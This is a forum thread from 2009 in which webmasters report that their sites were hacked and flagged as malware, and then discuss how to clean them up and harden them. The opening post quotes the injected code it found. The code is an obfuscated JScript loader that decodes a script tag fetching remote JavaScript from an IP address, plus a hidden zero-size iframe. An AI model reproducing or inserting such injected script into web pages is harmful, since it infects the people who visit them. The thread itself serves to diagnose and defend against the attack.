homepage Welcome to WebmasterWorld Guest from 54.166.96.101
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
Forum Library, Charter, Moderators: phranque

Website Technology Issues Forum

    
Malware Traps?
mqcarpenter

5+ Year Member



 
Msg#: 3898567 posted 12:32 pm on Apr 23, 2009 (gmt 0)

Not sure if this is the right place for this.

I recently got nailed by Google on some of my sites. They categorized my sites as "malware." Bizarre to say the least. I have been operating these sites for almost ten years. Anyway, I found a strange piece of code at the bottom of one of my pages:

<!-- ad --><html><script>
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/
</script></html><!-- /ad --><!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://example.com/trf.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script><!-- counter -->

I have no idea how this happened. Has anyone had this happen to them? HOW can this get on there? I want to prevent this kind of thing from happening in the future.

[edited by: engine at 7:34 pm (utc) on April 24, 2009]
[edit reason] examplified [/edit]

 

ebby

5+ Year Member



 
Msg#: 3898567 posted 12:56 pm on Apr 23, 2009 (gmt 0)

This just happened to me also, any help would be greatly appreciated. Mine was a PunBB forum

ebby

5+ Year Member



 
Msg#: 3898567 posted 1:05 pm on Apr 23, 2009 (gmt 0)

This is the exact same code found on my index and login php pages. EXACT. Not cool.

mqcarpenter

5+ Year Member



 
Msg#: 3898567 posted 3:56 pm on Apr 23, 2009 (gmt 0)

Well I did not do it! lol

ebby

5+ Year Member



 
Msg#: 3898567 posted 4:30 pm on Apr 23, 2009 (gmt 0)

what type of site was it?

neil665

5+ Year Member



 
Msg#: 3898567 posted 11:14 am on Apr 24, 2009 (gmt 0)

Also had similar code added to a couple of sites recently,
'mysite.co.uk' and 'mysite.com'.
The 'mysite.co.uk' is a regional u.k. tourism site
and the 'mysite.com' is where i do my future development.

Both sites are on the same server located in the u.k.

Have now changed the passwords.

Regards

Neil

Mishkan

5+ Year Member



 
Msg#: 3898567 posted 7:35 pm on Apr 26, 2009 (gmt 0)

Hi

I also had the same thing,

i deleted the codes and after 2 days it was up again on the index.php and login.php file on my site,

does anyone know what this is?

g1smd

WebmasterWorld Senior Member g1smd us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3898567 posted 8:59 pm on Apr 26, 2009 (gmt 0)

Looks like you have been hacked with code that does something nasty when a visitor looks at the page.

That sort of attack is getting much more common; wordpress and other similar products have been targeted several times.

There's a lot of advice in previous threads. You need to go beyond cleaning out the code and changing the passwords. There is some fundamental loophole that the miscreants are taking advantage of.

neil665

5+ Year Member



 
Msg#: 3898567 posted 9:01 am on Apr 28, 2009 (gmt 0)

The 'mysite.com' site was again attacked yesterday,
and google has blocked this site.

Regards Neil

lammert

WebmasterWorld Senior Member lammert us a WebmasterWorld Top Contributor of All Time 5+ Year Member



 
Msg#: 3898567 posted 9:55 am on Apr 28, 2009 (gmt 0)

Shared hosting or VPS/dedicated?

If shared hosting, move to another hosting company. With shared hosting you have only limited possibilities to close such holes and with shared hosting many times the problem is caused by the hosting provider rather then the website operator.

neil665

5+ Year Member



 
Msg#: 3898567 posted 6:37 am on Apr 29, 2009 (gmt 0)

Using shared hosting,
does VPS provide a higher level of security.
Is it still open to hackers adding malicious code?

Regards Neil

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved